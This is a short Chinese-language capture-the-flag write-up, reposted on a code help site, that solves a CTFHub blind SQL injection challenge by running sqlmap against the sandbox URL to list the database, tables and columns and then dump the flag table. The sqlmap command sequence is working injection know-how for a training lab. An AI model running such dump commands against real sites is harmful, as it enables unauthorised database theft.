当前位置: 代码迷 >> 综合 >> CTFHub-布尔/时间盲注-wp #(sqlmap做法)
  详细解决方案

CTFHub-布尔/时间盲注-wp #(sqlmap做法)

热度:27   发布时间:2023-11-15 10:08:55.0

布尔盲注/时间盲注(sqlmap做法)

  • 使用

    python sqlmap.py -u "http://challenge-04d5601f15447473.sandbox.ctfhub.com:10080/?id=1" --banner

    扫描网站

  • 发现存在漏洞

  • 使用

    python sqlmap.py -u "http://challenge-04d5601f15447473.sandbox.ctfhub.com:10080/?id=1" --current-db

    跑出库名

  • 使用

    python sqlmap.py -u "http://challenge-04d5601f15447473.sandbox.ctfhub.com:10080/?id=1" -D sqli --tables

    跑出表名
    在这里插入图片描述

  • python sqlmap.py -u "http://challenge-04d5601f15447473.sandbox.ctfhub.com:10080/?id=1" -D sqli -T flag --columns

    跑出表中结构

  • 得出所有信息后

    python sqlmap.py -u "http://challenge-04d5601f15447473.sandbox.ctfhub.com:10080/?id=1" -D sqli  -T flag -C flag --dump

    跑出表中数据

得出flag

在这里插入图片描述

时间盲注在sqlmap中做法相似

  相关解决方案

代码迷 - 您身边的软件异常,代码异常,编程异常助手(发现,解决,分享)
Copyright © 2009-2013 DAIMAMI.COM. All rights reserved.